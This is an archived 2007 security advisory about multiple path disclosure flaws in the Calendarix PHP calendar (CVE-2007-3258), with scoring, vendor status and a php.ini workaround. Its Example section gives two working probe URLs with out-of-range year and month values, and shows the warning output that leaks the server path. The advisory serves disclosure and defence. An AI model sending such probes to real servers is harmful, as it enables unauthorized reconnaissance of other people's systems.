netVigilance Vulnerability intelligence since 2004

Archived document Original netVigilance advisory, published June 25 2007. Preserved as published — the advisory text and version numbers are unchanged; it is shown here converted from the original HTML page.

advisory0035 · CVE-2007-3258 · published 2007-06-25

Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities

archived risk: low

Current status

This advisory describes a vulnerability from 2007. It is not in the CISA Known Exploited Vulnerabilities catalog and there is no active remediation deadline. The page is kept online because other security databases link to it.

CVE reference CVE-2007-3258
In KEV catalog no
Affected software Calendarix version 0.7. 20070307
Captured from netvigilance.com

Original document

Reproduced as it was published, including the advisory numbering, scoring and the disclosure timeline used at the time.

converted from html as published 2007-06-25
Description:

Calendarix is a powerful and easy to use calendar based on PHP and MySQL. It has been developed with ease of use and quick access to information in mind. It provides the user with the quickest possible navigation and accessing the most commonly used functions in the shortest steps.

This vulnerabilities can be exploited only with PHP version < 5.0.0 and MS Windows hosting.

External References:
Mitre CVE: CVE-2007-3258
NVD NIST: CVE-2007-3258
OSVDB: 35371

Summary:
Calendarix is a powerful and easy to use calendar based on PHP and MySQL.
Security problems in the product allow attackers to gather the true path of the server-side script.

Release Date:
June 25 2007

Severity:
Risk: Low

CVSS Metrics:
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 1.86

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: Path disclosure.

SecureScout Testcase ID:
TC 17967

Vulnerable Systems:
Calendarix version 0.7. 20070307

Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.

Vendor:
Vincent Hor (Calendarix Enterprise)

Vendor Status:
Vincent Hor of Calendarix Enterprise was not interested in coordinating release of Patch and Security Advisory, There is no official solution at this time.

Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = Off.

Example:

Path Disclosure Vulnerability 1:

REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?year=10000

REPLY:
<b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br /><b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br /> ... <b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br /><b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br />

Path Disclosure Vulnerability 2:

REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?month=10000

REPLY:
<b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br /><b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br /> ... <b>Warning</b>: mktime(): Windows does not support negative values for this function in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br /><b>Warning</b>: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br />

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
Original URL: /advisory0035.html · preserved at the same address

Why this page still exists

Advisories published between 2004 and 2015 are referenced by vulnerability databases, academic papers and mailing list archives. Removing them would break those references, so every advisory keeps its original address and its original text. Nothing on this page has been rewritten to match current practice.